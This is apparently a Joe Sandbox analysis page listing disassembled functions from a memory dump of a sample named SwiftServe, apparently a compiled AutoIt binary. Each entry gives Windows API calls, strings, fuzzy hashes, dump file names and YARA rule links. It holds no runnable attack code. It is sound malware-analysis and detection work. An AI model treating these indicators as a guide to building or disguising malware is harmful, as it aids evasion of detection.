Instruction ID: 02fc2eff06403edfd7ba5f2f499d4aede0028fe994dc654e23b5a98d6d2690cf
Opcode Fuzzy Hash: 460606309e17986d9b3f941b9d943efcc50b58c3e9b5a31fa261395262f54767
Instruction Fuzzy Hash: F221C371A00218ABCF04EF65C885EEE7BF5EF94340F446499F905B7281DB30AA46CBA1

Function 00EA6CF9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00EA6D86
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00EA6D91

Strings

Combobox, xrefs: 00EA6D53

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 63632d644a3c0bc6cd66410f2567669eacbf84f63cb64c9c0b24b23370a8bd5d
Instruction ID: 8ae43527d7f22192e374461dc3453e00dc5cd8c8dbb137a29754abd4015c1ff8
Opcode Fuzzy Hash: 63632d644a3c0bc6cd66410f2567669eacbf84f63cb64c9c0b24b23370a8bd5d
Instruction Fuzzy Hash: 5A11C8713102087FEF119F54DC81EFB3B6AEB8A3A8F155129F914AF290D631AC518760

Function 00EA722C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00E22111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E2214F
Part of subcall function 00E22111: GetStockObject.GDI32(00000011), ref: 00E22163
Part of subcall function 00E22111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E2216D

GetWindowRect.USER32(00000000,?), ref: 00EA7296
GetSysColor.USER32(00000012), ref: 00EA72B0

Strings

static, xrefs: 00EA7273

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 33676f8ade1e9bb9bd7d96512f500253d05aecd3a5dddc2c5ec6c3fd2a71d1c7
Instruction ID: cab99180f05ddf93f3acf086487cf9d8a21153b49e42f2391240f84383b5ac15
Opcode Fuzzy Hash: 33676f8ade1e9bb9bd7d96512f500253d05aecd3a5dddc2c5ec6c3fd2a71d1c7
Instruction Fuzzy Hash: 2521477261420AAFDB04DFA8CC45EEA7BA8EB49314F005618FD95E3250E734E8509B60

Function 00EA6F45 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00EA6FC7
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00EA6FD6

Strings

edit, xrefs: 00EA6FAB

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 5114bace4e6cf8287a4930b62e17c42066e3e866354bb11b8b47574175a9e680
Instruction ID: 98068748c3be08ebde3e6338a5d2b2ec3830f40e02a44ef6e824695dcc41474b
Opcode Fuzzy Hash: 5114bace4e6cf8287a4930b62e17c42066e3e866354bb11b8b47574175a9e680
Instruction Fuzzy Hash: 53118275200208AFEB114E64EC80EEB3B6AEB0B378F146714F964AB1E0C731EC509760

Function 00E83156 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E831C9
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00E831E8

Strings

0, xrefs: 00E831BF

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 74302580d4c19bb0fb4fdc9fdfd0c0047698efe627c75a8e32c289318ec2f51b
Instruction ID: 32045dcc8e59ba5328c2ae7e1493c8a6004f0915d110e46e122362368a501db1
Opcode Fuzzy Hash: 74302580d4c19bb0fb4fdc9fdfd0c0047698efe627c75a8e32c289318ec2f51b
Instruction Fuzzy Hash: 0011E635902118ABDB20FAB8DC49B9D77B8AB05F14F141125E84DB72A0DB70AF05CB91

Function 00E234E4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

DeleteObject.GDI32(?), ref: 00E2351D
DestroyWindow.USER32(?,?,00E34E61), ref: 00E23576

Strings

h, xrefs: 00E234E5

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: DeleteDestroyObjectWindow
String ID: h
API String ID: 2587070983-1717268160
Opcode ID: 728a1837003cb6027e7f7eb5cbaa0ce8d42bdbc2e37d781ee87d40ef8ee41d31
Instruction ID: 91932673c5c7185f99b58d9db8c2a8671aa1af16f96eac7fbdacad8728db05c7
Opcode Fuzzy Hash: 728a1837003cb6027e7f7eb5cbaa0ce8d42bdbc2e37d781ee87d40ef8ee41d31
Instruction Fuzzy Hash: 982142306482748FCB18EB2AF89862933E1B754315B046169F84ABF261DB34DE48CF44

Function 00E928A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00E928F8
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00E92921

Strings

<local>, xrefs: 00E928E9

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 72959d3be8509a9fa4e08016c9cb636d0def7ff1e4cf1fb2e44fc2a95ba8a0c2
Instruction ID: 92029d7bedb8fe03a8a3b071bd8ebbd76d3505f78ce1b088e0736bba53e8fe53
Opcode Fuzzy Hash: 72959d3be8509a9fa4e08016c9cb636d0def7ff1e4cf1fb2e44fc2a95ba8a0c2
Instruction Fuzzy Hash: DF119E70501325BAEF298A52CC89EFBFBA8EF05755F10922EF64566100E7706894D6E0

Function 00E8D116 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON

Download Yara Rule

APIs

_wcscmp.LIBCMT ref: 00E8D180

Strings

0.0.0.0, xrefs: 00E8D18E
L,, xrefs: 00E8D12E

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: _wcscmp
String ID: 0.0.0.0$L,
API String ID: 856254489-1974781669
Opcode ID: cf288e9ccebe3f96010710e10ce74a2cf2a4ffe266a9918e031cea75b6bdd586
Instruction ID: ee96d0cfde028b1eb0db8faec7d739ae00a7c24d29a1b6faa3a8a83233090807
Opcode Fuzzy Hash: cf288e9ccebe3f96010710e10ce74a2cf2a4ffe266a9918e031cea75b6bdd586
Instruction Fuzzy Hash: 1211BF757042149FCB04EE25D985E9AB7F9AF84724F509049EA0D7B3E2CA30ED42CB50

Function 00E98475 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00E986E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00E9849D,?,00000000,?,?), ref: 00E986F7

inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00E984A0
htons.WSOCK32(00000000,?,00000000), ref: 00E984DD

Strings

255.255.255.255, xrefs: 00E984B8

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: ByteCharMultiWidehtonsinet_addr
String ID: 255.255.255.255
API String ID: 2496851823-2422070025
Opcode ID: e76bc78bb2c45cb07e93d2a07da2d3b48b1309f9912c3cb0618d1dca0976bd5d
Instruction ID: 613f1351f5fd10a95758e4466740fe676b4ef0ef870688049d9c34871b70710b
Opcode Fuzzy Hash: e76bc78bb2c45cb07e93d2a07da2d3b48b1309f9912c3cb0618d1dca0976bd5d
Instruction Fuzzy Hash: DF11E531200216ABCF10AF64DD46FEEB768FF01310F10961AF925B72D2DB31A814C755

Function 00E799BD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E31A36: _memmove.LIBCMT ref: 00E31A77

Part of subcall function 00E7B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00E7B7BD

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00E79A2B

Strings

ListBox, xrefs: 00E799F5
ComboBox, xrefs: 00E799CA

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 365172f82195b47c39690212990cf074cea1d4f037ca67fdcdc2a5b717bb6796
Instruction ID: 2de6c55d4a8e3c3787bcfc1cbe571275457462359df0f759940372832fe5fa72
Opcode Fuzzy Hash: 365172f82195b47c39690212990cf074cea1d4f037ca67fdcdc2a5b717bb6796
Instruction Fuzzy Hash: D501F571A42214AB8B18EBA4CC55DFEB7A9EF52320F10671AF865733C2DB305908C650

Function 00E2BBC6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00E2BC07

Part of subcall function 00E31821: _memmove.LIBCMT ref: 00E3185B

_wcscat.LIBCMT ref: 00E63593

Strings

s, xrefs: 00E2BC47

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: FullNamePath_memmove_wcscat
String ID: s
API String ID: 257928180-1727430956
Opcode ID: 2ec2b0bc89629b6ab4fc70fd0034c962dc7489614487fb1b18cb87362ec26a4e
Instruction ID: 18a60afd653084f982ac4bae10c5d0bb7ab637fbfe87167d62693faa9d63ae0b
Opcode Fuzzy Hash: 2ec2b0bc89629b6ab4fc70fd0034c962dc7489614487fb1b18cb87362ec26a4e
Instruction Fuzzy Hash: 681152319042189A8B45EBA4A846EDEB7F8FF48350F1020A9B985F7251DF70D7889B51

Function 00E8934C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00E89367
__fread_nolock.LIBCMT ref: 00E8937C

Strings

EA06, xrefs: 00E893AE

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: 92764dd8e748a2bc59554fb9b80923a0e1c819ed528bdcbb693af7268a2e0190
Instruction ID: 572f63e9cd336f8545b18ff0d8989df3cc0be33636271f6f68c58ad0751e1289
Opcode Fuzzy Hash: 92764dd8e748a2bc59554fb9b80923a0e1c819ed528bdcbb693af7268a2e0190
Instruction Fuzzy Hash: C901F972D042587EDB18C6A8C856EFE7BF8DB05301F04419AF556E2282E574A6048760

Function 00E798B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E31A36: _memmove.LIBCMT ref: 00E31A77

Part of subcall function 00E7B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00E7B7BD

SendMessageW.USER32(?,00000180,00000000,?), ref: 00E79923

Strings

ListBox, xrefs: 00E798ED
ComboBox, xrefs: 00E798C2

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 737f4b36cfac3b1795c0f5e4b8fe22d917aaac02689ef64f47afce0b5988821c
Instruction ID: f96896491d506f4db1b338477d3efb217f425ca0bf86e1f26faf1bcb5f11da3b
Opcode Fuzzy Hash: 737f4b36cfac3b1795c0f5e4b8fe22d917aaac02689ef64f47afce0b5988821c
Instruction Fuzzy Hash: 11012B71A411046BDB18EBA0C956EFFB7ECDF51300F14611EF94573282DA105F08D6B1

Function 00E7993A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E31A36: _memmove.LIBCMT ref: 00E31A77

Part of subcall function 00E7B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00E7B7BD

SendMessageW.USER32(?,00000182,?,00000000), ref: 00E799A6

Strings

ListBox, xrefs: 00E79972
ComboBox, xrefs: 00E79947

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 6d96abf3db3b3f70cbf8abebf21e9e423a1eb0122b35ab298ae2d5542403ed95
Instruction ID: 1ebab89ebb060db093ba21cc39a1141278f492e09c7b950eab0c606baa42d8e2
Opcode Fuzzy Hash: 6d96abf3db3b3f70cbf8abebf21e9e423a1eb0122b35ab298ae2d5542403ed95
Instruction Fuzzy Hash: 3D01DB72A4110467DB14EBA4C916EFFB7ECDF51340F14615AF94973282DA145F08D671

Function 00E46D9E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00E46DC0
__calloc_crt.LIBCMT ref: 00E46DD9

Strings

@b, xrefs: 00E46DF0

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: __calloc_crt
String ID: @b
API String ID: 3494438863-2077063687
Opcode ID: 087dd0e96c88b9c7d838abc27c2fd8e0d2a5780ef412b435aa7127b37061b7b7
Instruction ID: 9cb7e3bf85ba5f06cd8ba4cbb523dc7a21e33a15dbbab0cf0e0ae7764ccfa786
Opcode Fuzzy Hash: 087dd0e96c88b9c7d838abc27c2fd8e0d2a5780ef412b435aa7127b37061b7b7
Instruction Fuzzy Hash: 71F0AFB1B0865ACFE724AF5ABD816A527D5E74A724F102067F240FE2A4F77088C18681

Function 00E854E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00E85501
_wcscmp.LIBCMT ref: 00E85513

Strings

#32770, xrefs: 00E8550D

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: 05f78686770f8a35b7587f2e9aba41b6c034cef0ff59500b3b723aa6c4326be1
Instruction ID: b8b572a26359c65d1c8aa6cfda7e4870c94f4d87b3d195f5e4208c7e1eec7b8f
Opcode Fuzzy Hash: 05f78686770f8a35b7587f2e9aba41b6c034cef0ff59500b3b723aa6c4326be1
Instruction Fuzzy Hash: 94E02B335002281BD310A699AC49AABFBACDB04771F001057B808E6051EE60A90587D0

Function 00E78892 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00E788A0

Part of subcall function 00E43588: _doexit.LIBCMT ref: 00E43592

Strings

Error allocating memory., xrefs: 00E78899
AutoIt, xrefs: 00E78894

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: f15271f92b9d600702a207ed876dd95bb94576a639d01be81a4401ded63dc2b0
Instruction ID: 065ba7c4b1d3c084fbeafd13b1b9085fdc9beda2f2582d57302b0fffb9b60105
Opcode Fuzzy Hash: f15271f92b9d600702a207ed876dd95bb94576a639d01be81a4401ded63dc2b0
Instruction Fuzzy Hash: FED0127128535836D21472A47D0BBCB6A888B05B51F44546ABB08755C389D595918295

Function 00E60251 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 00E60091

Part of subcall function 00E9C6D9: LoadLibraryA.KERNEL32(kernel32.dll,?,00E6027A,?), ref: 00E9C6E7
Part of subcall function 00E9C6D9: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00E9C6F9

FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00E60289

Strings

WIN_XPe, xrefs: 00E600A4

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Library$AddressDirectoryFreeLoadProcSystem
String ID: WIN_XPe
API String ID: 582185067-3257408948
Opcode ID: adbe04507e2b9a2ce9b106cde001f2eb212ee4933d93e2dd77c6722bcb968d10
Instruction ID: f0ad8c94f6fc0a63d38a6d6ef752e50bcdb98e3df372a01a8bf5a170a506a592
Opcode Fuzzy Hash: adbe04507e2b9a2ce9b106cde001f2eb212ee4933d93e2dd77c6722bcb968d10
Instruction Fuzzy Hash: 97F06D70845119DFCB55DBA1D988BEEBBF8AB08344F242485E146B21A1CB705F88CF20

Function 00E35800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19windowCOMMON

Download Yara Rule

APIs

DestroyIcon.USER32(,z,00EE7A2C,00EE7890,?,00E35A53,00EE7A2C,00EE7A30,?,00000004), ref: 00E35823

Strings

,z, xrefs: 00E35808, 00E35821
SZ, xrefs: 00E35804

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

